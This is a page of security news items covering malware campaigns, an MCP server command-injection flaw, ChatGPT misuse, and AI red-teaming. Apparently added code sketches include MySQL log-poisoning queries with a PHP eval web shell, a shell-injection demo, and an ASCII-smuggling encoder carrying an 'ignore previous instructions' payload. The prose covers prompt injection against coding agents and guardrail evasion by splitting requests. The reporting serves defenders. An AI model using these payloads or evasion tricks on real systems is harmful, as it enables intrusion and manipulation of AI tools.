Tag: Cyber Security

  • Chinese Hackers Weaponize Open-Source Nezha Tool in New Attack Wave


    Oct 08, 2025Ravie LakshmananMalware / Threat Intelligence

    Threat actors with suspected ties to China have turned a legitimate open-source monitoring tool called Nezha into an attack weapon, using it to deliver a known malware called Gh0st RAT to targets.

    The activity, observed by cybersecurity company Huntress in August 2025, is characterized by the use of an unusual technique called log poisoning (aka log injection) to plant a web shell on a web server.

    “This allowed the threat actor to control the web server using ANTSWORD, before ultimately deploying Nezha, an operation and monitoring tool that allows commands to be run on a web server,” researchers Jai Minton, James Northey, and Alden Schmidt said in a report shared with The Hacker News.


    In all, the intrusion is said to have likely compromised more than 100 victim machines, with a majority of the infections reported in Taiwan, Japan, South Korea, and Hong Kong.

    The attack chain pieced together by Huntress shows that the attackers, described as a “technically proficient adversary,” leveraged a publicly exposed and vulnerable phpMyAdmin panel to obtain initial access, and then set the language to simplified Chinese.

    The threat actors subsequently accessed the server's SQL query interface and ran various SQL commands in quick succession to drop a PHP web shell in an internet-accessible directory, after first ensuring that queries were written to disk by enabling general query logging.

    “They then issued a query containing their one-liner PHP web shell, causing it to be recorded in the log file,” Huntress explained. “Crucially, they set the log file’s name with a .php extension, allowing it to be executed directly by sending POST requests to the server.”
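    The poisoning sequence described above can be sketched as follows. The SQL statements, file path, and web shell one-liner are hypothetical reconstructions, not the actual artifacts from the intrusion; the helper at the end is a defender-side check for the dangerous log configuration.

```python
# Illustrative reconstruction of MySQL general-query-log poisoning.
# Path and web shell are hypothetical, not the artifacts Huntress observed.
POISONING_QUERIES = [
    "SET GLOBAL general_log = 'ON';",
    # Naming the log file with a .php extension is the crucial step:
    "SET GLOBAL general_log_file = '/var/www/html/updates.php';",
    # The SELECT itself is harmless; its text lands verbatim in the log:
    "SELECT '<?php @eval($_POST[\"x\"]); ?>';",
]

def log_config_is_dangerous(general_log: str, log_file: str) -> bool:
    """Flag a general query log that is both enabled and written to a
    path the web server would execute as PHP."""
    return general_log.upper() == "ON" and log_file.lower().endswith(".php")

print(log_config_is_dangerous("ON", "/var/www/html/updates.php"))   # True
print(log_config_is_dangerous("ON", "/var/log/mysql/general.log"))  # False
```

    Auditing `general_log` and `general_log_file` for web-root paths is one simple way to spot this technique after the fact.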

    The access afforded by the ANTSWORD web shell is then used to run the “whoami” command to determine the privileges of the web server and deliver the open-source Nezha agent, which can be used to remotely commandeer an infected host by connecting to an external server (“c.mid[.]al”).

    An interesting aspect of the attack is that the threat actor behind the operation has been running their Nezha dashboard in Russian, with over 100 victims listed across the world. A smaller concentration of victims is scattered across Singapore, Malaysia, India, the U.K., the U.S., Colombia, Laos, Thailand, Australia, Indonesia, France, Canada, Argentina, Sri Lanka, the Philippines, Ireland, Kenya, and Macao, among others.


    The Nezha agent enables the next stage of the attack chain, facilitating the execution of an interactive PowerShell script to create Microsoft Defender Antivirus exclusions and launch Gh0st RAT, a malware widely used by Chinese hacking groups. The malware is executed by means of a loader that, in turn, runs a dropper responsible for configuring and starting the main payload.

    “This activity highlights how attackers are increasingly abusing new and emerging publicly available tooling as it becomes available to achieve their goals,” the researchers said.

    “Due to this, it’s a stark reminder that while publicly available tooling can be used for legitimate purposes, it’s also commonly abused by threat actors due to the low research cost, ability to provide plausible deniability compared to bespoke malware, and likelihood of being undetected by security products.”


    Source: thehackernews.com…

  • LockBit, Qilin, and DragonForce Join Forces to Dominate the Ransomware Ecosystem


    Three prominent ransomware groups, DragonForce, LockBit, and Qilin, have announced a new strategic alliance, once again underscoring continued shifts in the cyber threat landscape.

    The coalition is seen as an attempt on the part of the financially motivated threat actors to conduct more effective ransomware attacks, ReliaQuest said in a report shared with The Hacker News.

    “Announced shortly after LockBit’s return, the collaboration is expected to facilitate the sharing of techniques, resources, and infrastructure, strengthening each group’s operational capabilities,” the company noted in its ransomware report for Q3 2025.

    “This alliance could help restore LockBit’s reputation among affiliates following last year’s takedown, potentially triggering a surge in attacks on critical infrastructure and expanding the threat to sectors previously considered low risk.”


    The partnership with Qilin is no surprise, given that it has become the most active ransomware group in recent months, claiming a little over 200 victims in Q3 2025 alone.

    “In Q3 2025, Qilin disproportionately targeted North America-based organizations,” ZeroFox said in its Q3 2025 Ransomware Wrap-Up report. “Qilin’s operational tempo began to increase significantly in Q4 2024, when the collective conducted at least 46 attacks.”

    The development coincides with the emergence of LockBit 5.0, which is equipped to target Windows, Linux, and ESXi systems. The latest iteration was first advertised on September 3, 2025, on the RAMP darknet forum on the sixth anniversary of the affiliate program.

    LockBit was dealt a massive blow in early 2024 following a law enforcement operation dubbed Cronos that seized its infrastructure and led to the arrest of some of its members. At its peak, the group is estimated to have targeted over 2,500 victims worldwide and received more than $500 million in ransom payments.

    “If the group manages to rebuild its trust among affiliates, it could reemerge as a dominant ransomware threat, driven by financial motives and by a desire for revenge against law enforcement crackdowns,” ReliaQuest said.

    [Chart: R&DE incidents by week in Q3 2025]

    The return of LockBit and its alliance comes as the threat actor known as Scattered Spider appears to be gearing up to launch its own ransomware-as-a-service (RaaS) program called ShinySp1d3r, making it the first such service by an English-speaking extortion crew.

    ReliaQuest said it’s tracking a total of 81 data leak sites, a significant jump from 51 reported in early 2024. Companies in the professional, scientific, and technical services sector account for the largest number of victims during the time period, surpassing 375.

    Manufacturing, construction, healthcare, finance and insurance, retail, accommodation and food services, education, arts and entertainment, information, and real estate are some of the other commonly affected sectors.


    Another noteworthy trend is the spike in ransomware attacks targeting countries like Egypt, Thailand, and Colombia, indicating that threat actors are expanding beyond “traditional hotspots” such as Europe and the U.S. to evade law enforcement scrutiny. The vast majority of the victims listed on data leak sites are based in the U.S., Germany, the U.K., Canada, and Italy.

    According to data from ZeroFox, there have been a total of at least 1,429 separate ransomware and digital extortion (R&DE) incidents in Q3 2025, down from 1,961 incidents observed in Q1 2025. Qilin, Akira, INC Ransom, Play, and SafePay have been found to be responsible for approximately 47 percent of all global R&DE attacks in Q2 and Q3 2025.

    “The disproportionate targeting of North America-based entities can be partly attributed to the geopolitical motivations and ideological beliefs of financially motivated threat collectives fueled by opposition to ‘Western’ political and social narratives,” the company said.

    “North America hosts a wide variety of robust industries that comprise substantial and fast-growing digital attack surfaces. The widespread integration of technologies such as cloud networking services and Internet of Things devices contributes to the accessibility of North American assets.”


    Source: thehackernews.com…

  • Severe Figma MCP Vulnerability Lets Hackers Execute Code Remotely — Patch Now


    Oct 08, 2025Ravie LakshmananVulnerability / Software Security


    Cybersecurity researchers have disclosed details of a now-patched vulnerability in the popular figma-developer-mcp Model Context Protocol (MCP) server that could allow attackers to achieve code execution.

    The vulnerability, tracked as CVE-2025-53967 (CVSS score: 7.5), is a command injection bug stemming from the unsanitized use of user input, opening the door to a scenario where an attacker can send arbitrary system commands.

    “The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (|, >, &&, etc.),” according to a GitHub advisory for the flaw. “Successful exploitation can lead to remote code execution under the server process’s privileges.”

    Given that the Framelink Figma MCP server exposes various tools to perform operations in Figma using artificial intelligence (AI)-powered coding agents like Cursor, an attacker could trick the MCP client into executing unintended actions by means of an indirect prompt injection.


    Cybersecurity company Imperva, which discovered and reported the problem in July 2025, described CVE-2025-53967 as a “design oversight” in the fallback mechanism that could allow bad actors to achieve full remote code execution, putting developers at risk of data exposure.

    The command injection flaw “occurs during the construction of a command-line instruction used to send traffic to the Figma API endpoint,” security researcher Yohann Sillam said.

    The exploitation sequence unfolds over the following steps –

    • The MCP client sends an Initialize request to the MCP endpoint to receive an mcp-session-id that’s used in subsequent communication with the MCP server
    • The client sends a JSONRPC request to the MCP server with the method tools/call to call tools like get_figma_data or download_figma_images
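    The two steps above can be sketched as JSON-RPC payloads. The tool name get_figma_data comes from the article; the request IDs, protocol version, and arguments are illustrative assumptions.

```python
import json

# Step 1: initialize handshake; the response carries the mcp-session-id
# header that is replayed on every subsequent request.
initialize = {
    "jsonrpc": "2.0", "id": 1, "method": "initialize",
    "params": {"protocolVersion": "2025-03-26",
               "clientInfo": {"name": "poc-client", "version": "0.1"}},
}

# Step 2: invoke one of the exposed tools, e.g. get_figma_data.
tool_call = {
    "jsonrpc": "2.0", "id": 2, "method": "tools/call",
    "params": {"name": "get_figma_data",
               "arguments": {"fileKey": "EXAMPLE-FILE-KEY"}},
}

for request in (initialize, tool_call):
    print(json.dumps(request))
```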

    The issue, at its core, resides in “src/utils/fetch-with-retry.ts,” which first attempts to get content using the standard fetch API and, if that fails, falls back to executing a curl command via child_process.exec, which introduces the command injection flaw.

    “Because the curl command is constructed by directly interpolating URL and header values into a shell command string, a malicious actor could craft a specially designed URL or header value that injects arbitrary shell commands,” Imperva said. “This could lead to remote code execution (RCE) on the host machine.”

    In a proof-of-concept attack, a remote bad actor on the same network (e.g., a public Wi-Fi or a compromised corporate device) can trigger the flaw by sending a series of requests to the vulnerable MCP server. Alternatively, the attacker could trick a victim into visiting a specially crafted site as part of a DNS rebinding attack.

    The vulnerability has been addressed in version 0.6.3 of figma-developer-mcp, which was released on September 29, 2025. As a mitigation, it's advisable to avoid using child_process.exec with untrusted input and switch to child_process.execFile, which eliminates the risk of shell interpretation.
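    The difference between the two Node.js calls mirrors Python's subprocess with and without shell=True. A minimal demonstration (POSIX shell assumed) of why execFile-style argument lists defuse shell metacharacters:

```python
import subprocess

tainted = "https://example.test/file; echo INJECTED"

# exec-style: the tainted value is pasted into a shell command string,
# so the ";" terminates the first command and starts a second one.
shell_run = subprocess.run(f"echo {tainted}", shell=True,
                           capture_output=True, text=True)

# execFile-style: the tainted value is a single literal argv element,
# so the metacharacters are never interpreted by a shell.
argv_run = subprocess.run(["echo", tainted],
                          capture_output=True, text=True)

print(shell_run.stdout)  # second line reads "INJECTED"
print(argv_run.stdout)   # the full string, metacharacters intact
```

    The same reasoning explains the advisory's recommendation: passing arguments as a list removes the shell from the path entirely, rather than trying to sanitize every metacharacter.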

    “As AI-driven development tools continue to evolve and gain adoption, it’s essential that security considerations keep pace with innovation,” the Thales-owned company said. “This vulnerability is a stark reminder that even tools meant to run locally can become powerful entry points for attackers.”


    The development comes as FireTail revealed that Google has opted not to fix a new ASCII smuggling attack in its Gemini AI chatbot that could be weaponized to craft inputs that can slip through security filters and induce undesirable responses. Other large language models (LLMs) susceptible to this attack are DeepSeek and xAI’s Grok.

    “And this flaw is particularly dangerous when LLMs, like Gemini, are deeply integrated into enterprise platforms like Google Workspace,” the company said. “This technique enables automated identity spoofing and systematic data poisoning, turning a UI flaw into a potential security nightmare.”
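    ASCII smuggling commonly relies on Unicode “tag” characters (U+E0000 to U+E007F), which many interfaces render as invisible even though a model's tokenizer may still read them. A minimal sketch of the encoding, with a hypothetical payload:

```python
# Map printable ASCII into the invisible Unicode tag block and back.
def smuggle(text: str) -> str:
    return "".join(chr(0xE0000 + ord(c)) for c in text)

def reveal(text: str) -> str:
    return "".join(chr(ord(c) - 0xE0000) for c in text
                   if 0xE0000 <= ord(c) <= 0xE007F)

hidden = smuggle("ignore previous instructions")  # hypothetical payload
message = "Please summarize this page. " + hidden
print(len(message), reveal(message))
```

    Filters that only inspect visible characters miss the hidden span, which is what makes the technique useful for slipping instructions past review.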


    Source: thehackernews.com…

  • Step Into the Password Graveyard… If You Dare (and Join the Live Session)


    Oct 08, 2025The Hacker NewsPassword Security / Cyber Attacks

    Every year, weak passwords lead to millions in losses — and many of those breaches could have been stopped.

    Attackers don’t need advanced tools; they just need one careless login.

    For IT teams, that means endless resets, compliance struggles, and sleepless nights worrying about the next credential leak.

    This Halloween, The Hacker News and Specops Software invite you to a live webinar: “Cybersecurity Nightmares: Tales from the Password Graveyard” — a chilling reality check every IT leader needs.

    You’ll explore real-world password breaches, why traditional password policies fail, and how new tools can help you stop attacks before they happen.

    💀 What You’ll Learn

    • Real breach stories and the lessons behind them.
    • Why complexity alone doesn’t protect your users.
    • How Specops blocks breached passwords in real time.
    • A live demo of creating stronger, compliant, user-friendly policies.
    • A simple three-step plan for IT leaders to eliminate password risks fast.

    👉 Register now to join the live demo and get your action plan.

    🕸️ Make Passwords Secure — and Simple

    Poor password management doesn’t just create risk — it wastes time and hurts productivity. Specops helps IT teams strengthen security without adding friction for users.

    Join this session to learn how to:

    • Cut helpdesk resets.
    • Meet compliance requirements.
    • Stop credential-based attacks for good.

    🎃 Sign up today and end your password nightmares once and for all.



    Source: thehackernews.com…

  • No Time to Waste: Embedding AI to Cut Noise and Reduce Risk


    Artificial intelligence is reshaping cybersecurity on both sides of the battlefield. Cybercriminals are using AI-powered tools to accelerate and automate attacks at a scale defenders have never faced before. Security teams are overwhelmed by an explosion of vulnerability data, tool outputs, and alerts, all while operating with finite human resources. The irony is that while AI has become a dominant theme in cybersecurity, many enterprises still struggle to apply it effectively within their programs.

    The problem isn’t access to information, as teams already have more data than they can process. It’s cutting through the noise and focusing on what truly matters. AI is crucial here. Not only can it make security teams more efficient, it can generate insights that would be impossible to gather at scale or in real time without machine assistance. If adversaries are already weaponizing AI, then defenders must embed it into their strategies as well or risk falling further behind in a fight that is moving faster every day.

    Where to Embed AI to Deliver the Most Impact

    To keep pace with adversaries, defenders should focus on these key areas where AI provides the greatest advantage:

    • Deduplication and correlation: Cut through redundant data to create a trusted view of risk.
    • Prioritization: Ensure limited resources are spent on the exposures that matter most.
    • The intelligence layer: Augment human judgment with context, simulations, and recommendations.

    Together, these elements form the foundation of an AI-driven exposure management strategy that enables organizations to reduce risk continuously rather than reactively.

    Security tools are quickly developing AI to enhance decisions and analysis. When evaluating solutions, choose those with proven investment in AI and a clear vision for expansion. PlexTrac, the Pentest Report Automation & Threat Exposure Management platform, introduced AI in 2024 and is actively expanding its use to help teams manage their centralized data across the vulnerability lifecycle.

    Deduplication and Correlation: Creating a Clean Risk Picture

    One of the biggest obstacles security teams face isn’t the absence of tools, but the overload they create. Multiple scanners, asset inventories, and threat feeds often surface the same vulnerabilities again and again. Duplicate findings create noise, slow remediation, and make it nearly impossible to see a clean picture of risk. Analysts often spend more time reconciling conflicting data than actually reducing exposures, especially when findings are scattered across siloed tools instead of centralized in one place where they can be managed together.

    This is where AI can change the game. By normalizing, correlating, and deduplicating millions of records, AI can distill a massive dataset of duplicated vulnerabilities into a single, accurate, and correlated view. This clarity is the foundation for effective risk management. Without it, prioritization is guesswork.

    With centralized data management, platforms like PlexTrac already automate parts of this process, and the next step is applying intelligence to ensure teams can rely on the data in front of them, free from noise, duplication, and distraction.
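    As a toy illustration of the deduplication step, findings from multiple scanners can be collapsed on an (asset, CVE) key; the field names and values below are hypothetical, not any product's data model.

```python
findings = [
    {"scanner": "nessus", "asset": "web-01", "cve": "CVE-2024-0001", "severity": 9.8},
    {"scanner": "qualys", "asset": "web-01", "cve": "CVE-2024-0001", "severity": 9.1},
    {"scanner": "nessus", "asset": "db-02",  "cve": "CVE-2024-0002", "severity": 7.5},
]

def deduplicate(raw):
    """Collapse duplicate findings on (asset, CVE), keeping the highest
    reported severity and recording which scanners corroborated each one."""
    merged = {}
    for f in raw:
        key = (f["asset"], f["cve"])
        entry = merged.setdefault(key, {"severity": 0.0, "sources": set()})
        entry["severity"] = max(entry["severity"], f["severity"])
        entry["sources"].add(f["scanner"])
    return merged

merged = deduplicate(findings)
print(len(merged), "unique exposures from", len(findings), "raw findings")
```

    Keeping the corroborating sources alongside each merged exposure preserves an audit trail, so analysts can trust the consolidated view instead of re-checking the raw feeds.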

    Prioritization: Smarter Risk Prioritization

    Once your data is clean, the next challenge is deciding what to fix first. Traditional severity scores, like CVSS, often overwhelm teams with endless lists of “critical” issues. But severity doesn’t always equal risk. AI-driven prioritization blends exploit likelihood, asset exposure, business context, and real-time threat intelligence to surface the exposures with the highest business impact or likelihood of exploitation.

    Instead of spreading resources thin, teams can narrow their focus on the vulnerabilities most likely to be exploited.
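    A stripped-down version of such blended scoring might weight exploit likelihood and business context alongside raw severity. The weights and fields below are illustrative assumptions, not any vendor's actual model.

```python
def risk_score(cvss, exploit_likelihood, internet_facing, business_critical):
    """Blend raw severity with context so that a modest CVSS on an exposed,
    business-critical asset with a known exploit outranks a bare 'critical'."""
    score = cvss / 10.0                  # normalize to 0..1
    score *= 0.5 + exploit_likelihood    # 0.5x..1.5x multiplier
    if internet_facing:
        score *= 1.3
    if business_critical:
        score *= 1.4
    return round(min(score, 1.0) * 100)

# Actively exploited 7.5 on an exposed, critical asset...
a = risk_score(7.5, 0.9, True, True)
# ...versus an internal 9.8 with no known exploit.
b = risk_score(9.8, 0.05, False, False)
print(a, b)  # the contextual score ranks the first one higher
```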

    Platforms like PlexTrac have already released contextual risk-based scoring to prioritize remediation using relevant business context and are investing deeply in this intelligence-first prioritization to help organizations align security decisions directly with business outcomes.

    The Intelligence Layer: Augment Human Analysis

    The future of AI in cybersecurity isn’t about replacing analysts, but empowering them. AI can recommend areas of focus, surface potential exploits based on active threats, simulate attack scenarios, and enrich risk scores with live threat data. Analysts still make the calls, but with far more guidance, context, and confidence.

    This “intelligence layer” bridges automation and human judgment to help teams shift from reactive compliance to business-aligned defense.

    Platforms like PlexTrac are building toward this future, where defenders gain an edge not just in efficiency but in foresight.

    Fight Back Against AI: Turn Data Into Defense

    AI-powered deduplication and prioritization are the levers that determine whether organizations stay buried in noise or achieve measurable risk reduction. With adversaries already weaponizing AI, defenders must embed it into their strategies now.

    Done responsibly, AI transforms the flood of security data into actionable insight, allowing teams to cut through chaos, focus resources, and fight back against attackers who are already wielding AI as a weapon.

    As adversaries advance cyberattacks with AI, platforms like PlexTrac are investing heavily in advancing AI-driven capabilities to cut through noise, prioritize what matters, and reduce risk. See it in action by requesting a demo today.



    Source: thehackernews.com…

  • OpenAI Disrupts Russian, North Korean, and Chinese Hackers Misusing ChatGPT for Cyberattacks


    OpenAI on Tuesday said it disrupted three activity clusters that misused its ChatGPT artificial intelligence (AI) tool to facilitate malware development.

    This includes a Russian‑language threat actor who is said to have used the chatbot to help develop and refine a remote access trojan (RAT) and a credential stealer designed to evade detection. The operator also used several ChatGPT accounts to prototype and troubleshoot technical components that enable post‑exploitation and credential theft.

    “These accounts appear to be affiliated with Russian-speaking criminal groups, as we observed them posting evidence of their activities in a Telegram channel dedicated to those actors,” OpenAI said.

    The AI company said while its large language models (LLMs) refused the threat actor’s direct requests to produce malicious content, they worked around the limitation by creating building-block code, which was then assembled to create the workflows.

    Some of the produced output involved code for obfuscation, clipboard monitoring, and basic utilities to exfiltrate data using a Telegram bot. It’s worth pointing out that none of these outputs are inherently malicious on their own.

    “The threat actor made a mix of high‑ and lower‑sophistication requests: many prompts required deep Windows-platform knowledge and iterative debugging, while others automated commodity tasks (such as mass password generation and scripted job applications),” OpenAI added.

    “The operator used a small number of ChatGPT accounts and iterated on the same code across conversations, a pattern consistent with ongoing development rather than occasional testing.”

    The second cluster of activity originated from North Korea and shared overlaps with a campaign detailed by Trellix in August 2025 that targeted diplomatic missions in South Korea using spear-phishing emails to deliver Xeno RAT.


    OpenAI said the cluster used ChatGPT for malware and command-and-control (C2) development, and that the actors engaged in specific efforts such as developing macOS Finder extensions, configuring Windows Server VPNs, or converting Chrome extensions to their Safari equivalents.

    In addition, the threat actors have been found to use the AI chatbot to draft phishing emails, experiment with cloud services and GitHub functions, and explore techniques to facilitate DLL loading, in-memory execution, Windows API hooking, and credential theft.

    The third set of banned accounts, OpenAI noted, shared overlaps with a cluster tracked by Proofpoint under the name UNK_DropPitch (aka UTA0388), a Chinese hacking group which has been attributed to phishing campaigns targeting major investment firms with a focus on the Taiwanese semiconductor industry, with a backdoor dubbed HealthKick (aka GOVERSHELL).

    The accounts used the tool to generate content for phishing campaigns in English, Chinese, and Japanese; assist with tooling to accelerate routine tasks such as remote execution and traffic protection using HTTPS; and search for information related to installing open-source tools like nuclei and fscan. OpenAI described the threat actor as “technically competent but unsophisticated.”

    Outside of these three malicious cyber activities, the company also blocked accounts used for scam and influence operations –

    • Networks likely originating in Cambodia, Myanmar, and Nigeria abusing ChatGPT in attempts to defraud people online. These networks used AI to conduct translation, write messages, and create content for social media to advertise investment scams.
    • Individuals apparently linked to Chinese government entities using ChatGPT to assist in surveilling individuals, including ethnic minority groups like Uyghurs, and analyzing data from Western or Chinese social media platforms. The users asked the tool to generate promotional materials about such tools, but did not use the AI chatbot to implement them.
    • A Russian-origin threat actor linked to Stop News and likely run by a marketing company that used its AI models (and others) to generate content and videos for sharing on social media sites. The generated content criticized the role of France and the U.S. in Africa while promoting Russia’s role on the continent, and included English-language material pushing anti-Ukraine narratives.
    • A covert influence operation originating from China, codenamed “Nine-Dash Line,” that used its models to generate social media content critical of the Philippines’ President Ferdinand Marcos, as well as create posts about Vietnam’s alleged environmental impact in the South China Sea and political figures and activists involved in Hong Kong’s pro-democracy movement.

    In two different cases, suspected Chinese accounts asked ChatGPT to identify organizers of a petition in Mongolia and funding sources for an X account that criticized the Chinese government. OpenAI said its models returned only publicly available information as responses and did not include any sensitive information.

    “A novel use for this [China-linked influence] network was requests for advice on social media growth strategies, including how to start a TikTok challenge and get others to post content about the #MyImmigrantStory hashtag (a widely used hashtag of long standing whose popularity the operation likely strove to leverage),” OpenAI said.

    “They asked our model to ideate, then generate a transcript for a TikTok post, in addition to providing recommendations for background music and pictures to accompany the post.”


    OpenAI reiterated that its tools did not provide the threat actors with novel capabilities that they could not otherwise have obtained from publicly available resources online, and that they were instead used to add incremental efficiency to their existing workflows.

    But one of the most interesting takeaways from the report is that threat actors are trying to adapt their tactics to remove possible signs that could indicate that the content was generated by an AI tool.

    “One of the scam networks [from Cambodia] we disrupted asked our model to remove the em-dashes (long dash, –) from their output, or appears to have removed the em-dashes manually before publication,” the company said. “For months, em-dashes have been the focus of online discussion as a possible indicator of AI usage: this case suggests that the threat actors were aware of that discussion.”

    The findings from OpenAI come as rival Anthropic released an open-source auditing tool called Petri (short for “Parallel Exploration Tool for Risky Interactions”) to accelerate AI safety research and better understand model behavior across various categories like deception, sycophancy, encouragement of user delusion, cooperation with harmful requests, and self-preservation.

    “Petri deploys an automated agent to test a target AI system through diverse multi-turn conversations involving simulated users and tools,” Anthropic said.

    “Researchers give Petri a list of seed instructions targeting scenarios and behaviors they want to test. Petri then operates on each seed instruction in parallel. For each seed instruction, an auditor agent makes a plan and interacts with the target model in a tool use loop. At the end, a judge scores each of the resulting transcripts across multiple dimensions so researchers can quickly search and filter for the most interesting transcripts.”
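    The workflow Anthropic describes can be caricatured in a few lines; the stub functions below are hypothetical stand-ins, not Petri's actual API.

```python
# Stub "models" stand in for the auditor, target, and judge roles.
def auditor_turn(seed: str, history: list) -> str:
    return f"probe[{seed}#{len(history)}]"

def target_model(message: str) -> str:
    return f"reply-to:{message}"

def judge(transcript: list) -> dict:
    target_msgs = [m for role, m in transcript if role == "target"]
    # Toy scoring dimension: fraction of target replies echoing the probe.
    return {"compliance": sum("probe" in m for m in target_msgs) / len(target_msgs)}

def audit(seed: str, turns: int = 3) -> dict:
    transcript = []
    for _ in range(turns):
        msg = auditor_turn(seed, transcript)
        transcript.append(("auditor", msg))
        transcript.append(("target", target_model(msg)))
    return judge(transcript)

# Each seed instruction is audited independently, then scored.
scores = {seed: audit(seed) for seed in ("refuse-harmful-request", "flattery-bait")}
print(scores)
```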


    Source: thehackernews.com…

  • BatShadow Group Uses New Go-Based 'Vampire Bot' Malware to Hunt Job Seekers


    Oct 07, 2025Ravie LakshmananMalware / Threat Intelligence

    A Vietnamese threat actor named BatShadow has been attributed to a new campaign that leverages social engineering tactics to deceive job seekers and digital marketing professionals and deliver a previously undocumented malware called Vampire Bot.

    “The attackers pose as recruiters, distributing malicious files disguised as job descriptions and corporate documents,” Aryaka Threat Research Labs researchers Aditya K Sood and Varadharajan K said in a report shared with The Hacker News. “When opened, these lures trigger the infection chain of a Go-based malware.”

    The attack chains, per the cybersecurity company, leverage ZIP archives containing decoy PDF documents along with malicious shortcut (LNK) or executable files masquerading as PDFs to trick users into opening them. When launched, the LNK file runs an embedded PowerShell script that reaches out to an external server to download a lure document: a PDF advertising a marketing job at Marriott.

    The PowerShell script also downloads from the same server a ZIP file that includes files related to XtraViewer, a remote desktop connection software, and executes it likely with an aim to establish persistent access to compromised hosts.


    Victims who end up clicking on a link in the lure PDF to supposedly “preview” the job description are directed to another landing page that serves a fake error message stating the browser is unsupported and that “the page only supports downloads on Microsoft Edge.”

    “When the user clicks the OK button, Chrome simultaneously blocks the redirect,” Aryaka said. “The page then displays another message instructing the user to copy the URL and open it in the Edge browser to download the file.”

    The instruction to use Edge as opposed to, say, Google Chrome or other web browsers is likely down to the fact that scripted pop-ups and redirects are blocked by default in those browsers, whereas manually copying and pasting the URL into Edge allows the infection chain to continue, as it's treated as a user-initiated action.

    However, should the victim opt to open the page in Edge, the URL is programmatically launched in the web browser, only to display a second error message: “The online PDF viewer is currently experiencing an issue. The file has been compressed and sent to your device.”

    This subsequently triggers the auto-download of a ZIP archive containing the purported job description, including a malicious executable (“Marriott_Marketing_Job_Description.pdf.exe”) that mimics a PDF by padding extra spaces between “.pdf” and “.exe.”
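    Padded double extensions of this kind are easy to flag programmatically. The filename comes from the article; the check itself is a hypothetical sketch, not a tool from the report.

```python
import re

def looks_like_disguised_executable(name: str) -> bool:
    """Flag names such as 'report.pdf<many spaces>.exe' that push the real
    extension out of view in file listings."""
    return bool(re.search(r"\.(pdf|docx?|xlsx?)\s{2,}.*\.(exe|scr|com|lnk)$",
                          name, re.IGNORECASE))

print(looks_like_disguised_executable(
    "Marriott_Marketing_Job_Description.pdf                          .exe"))  # True
print(looks_like_disguised_executable("quarterly_report.pdf"))                # False
```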

    The executable is a Golang malware dubbed Vampire Bot that can profile the infected host, steal a wide range of information, capture screenshots at configurable intervals, and maintain communication with an attacker-controlled server (“api3.samsungcareers[.]work”) to run commands or fetch additional payloads.

    BatShadow’s links to Vietnam stem from the use of an IP address (103.124.95[.]161) that has been previously flagged as used by hackers with links to the country. Furthermore, digital marketing professionals have been one of the main targets of attacks perpetrated by various Vietnamese financially motivated groups, who have a track record of deploying stealer malware to hijack Facebook business accounts.


    In October 2024, Cyble also disclosed details of a sophisticated multi-stage attack campaign orchestrated by a Vietnamese threat actor that targeted job seekers and digital marketing professionals with Quasar RAT using phishing emails containing booby-trapped job description files.

    BatShadow is assessed to have been active for at least a year, with prior campaigns using similar domains, such as samsung-work[.]com, to propagate malware families including Agent Tesla, Lumma Stealer, and Venom RAT.

    “The BatShadow threat group continues to employ sophisticated social engineering tactics to target job seekers and digital marketing professionals,” Aryaka said. “By leveraging disguised documents and a multi-stage infection chain, the group delivers a Go-based Vampire Bot capable of system surveillance, data exfiltration, and remote task execution.”


    Source: thehackernews.com…

  • Google's New AI Doesn't Just Find Vulnerabilities — It Rewrites Code to Patch Them

    Google's New AI Doesn't Just Find Vulnerabilities — It Rewrites Code to Patch Them

    Oct 07, 2025 | Ravie Lakshmanan | Artificial Intelligence / Software Security

    Google’s DeepMind division on Monday announced an artificial intelligence (AI)-powered agent called CodeMender that automatically detects, patches, and rewrites vulnerable code to prevent future exploits.

    The agent builds on the company’s ongoing efforts to improve AI-powered vulnerability discovery, such as Big Sleep and OSS-Fuzz.

    DeepMind said the AI agent is designed to be both reactive and proactive, fixing new vulnerabilities as soon as they are spotted as well as rewriting and securing existing codebases, with the aim of eliminating whole classes of vulnerabilities in the process.

    “By automatically creating and applying high-quality security patches, CodeMender’s AI-powered agent helps developers and maintainers focus on what they do best — building good software,” DeepMind researchers Raluca Ada Popa and Four Flynn said.

    “Over the past six months that we’ve been building CodeMender, we have already upstreamed 72 security fixes to open source projects, including some as large as 4.5 million lines of code.”

    Under the hood, CodeMender leverages Google’s Gemini Deep Think models to debug, flag, and fix security vulnerabilities by addressing their root cause, and validates the resulting patches to ensure they don’t trigger any regressions.

    The AI agent, Google added, also makes use of a large language model (LLM)-based critique tool that highlights the differences between the original and modified code in order to verify that the proposed changes do not introduce regressions, and self-correct as required.

    Google said it also intends to gradually reach out to interested maintainers of critical open-source projects with CodeMender-generated patches and solicit their feedback, so that the tool can be used to keep codebases secure.

    The development comes as the company said it’s instituting an AI Vulnerability Reward Program (AI VRP) that lets researchers report AI-related issues in its products, such as prompt injections, jailbreaks, and misalignment, and earn rewards as high as $30,000.

    In June 2025, Anthropic revealed that models from various developers resorted to malicious insider behaviors when that was the only way to avoid replacement or achieve their goals, and that a model “misbehaved less when it stated it was in testing and misbehaved more when it stated the situation was real.”

    That said, policy-violating content generation, guardrail bypasses, hallucinations, factual inaccuracies, system prompt extraction, and intellectual property issues do not fall under the ambit of the AI VRP.

    Google, which previously set up a dedicated AI Red Team to tackle threats to AI systems as part of its Secure AI Framework (SAIF), has also introduced a second iteration of the framework to focus on agentic security risks like data disclosure and unintended actions, and the necessary controls to mitigate them.

    The company further noted that it’s committed to using AI to enhance security and safety, and use the technology to give defenders an advantage and counter the growing threat from cybercriminals, scammers, and state-backed attackers.


    Source: thehackernews.com…

  • XWorm 6.0 Returns with 35+ Plugins and Enhanced Data Theft Capabilities

    XWorm 6.0 Returns with 35+ Plugins and Enhanced Data Theft Capabilities

    Cybersecurity researchers have charted the evolution of the XWorm malware, which has turned into a versatile tool for supporting a wide range of malicious actions on compromised hosts.

    “XWorm’s modular design is built around a core client and an array of specialized components known as plugins,” Trellix researchers Niranjan Hegde and Sijo Jacob said in an analysis published last week. “These plugins are essentially additional payloads designed to carry out specific harmful actions once the core malware is active.”

    XWorm, first observed in 2022 and linked to a threat actor named EvilCoder, is a Swiss Army knife of malware that can facilitate data theft, keylogging, screen capture, persistence, and even ransomware operations. It’s primarily propagated via phishing emails and bogus sites advertising malicious ScreenConnect installers.

    Some of the other tools advertised by the developer include a .NET-based malware builder, a remote access trojan called XBinder, and a program that can bypass User Account Control (UAC) restrictions on Windows systems. In recent years, the development of XWorm has been led by an online persona called XCoder.

